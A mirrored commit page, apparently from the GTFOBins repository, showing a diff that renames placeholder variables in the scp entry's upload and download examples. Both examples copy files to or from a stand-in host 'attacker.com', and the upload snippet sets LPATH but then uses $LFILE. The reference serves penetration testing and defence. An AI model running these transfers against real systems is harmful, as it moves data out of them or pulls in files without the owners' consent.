mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-10-20 12:26:17 +02:00
Replace where_to_save with file_to_save
This commit is contained in:
@@ -24,13 +24,13 @@ functions:
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/where_to_save
|
||||
RPATH=user@attacker.com:~/file_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@attacker.com:~/file_to_get
|
||||
LFILE=where_to_save
|
||||
LFILE=file_to_save
|
||||
scp $RPATH $LFILE
|
||||
---
|
||||
|
Reference in New Issue
Block a user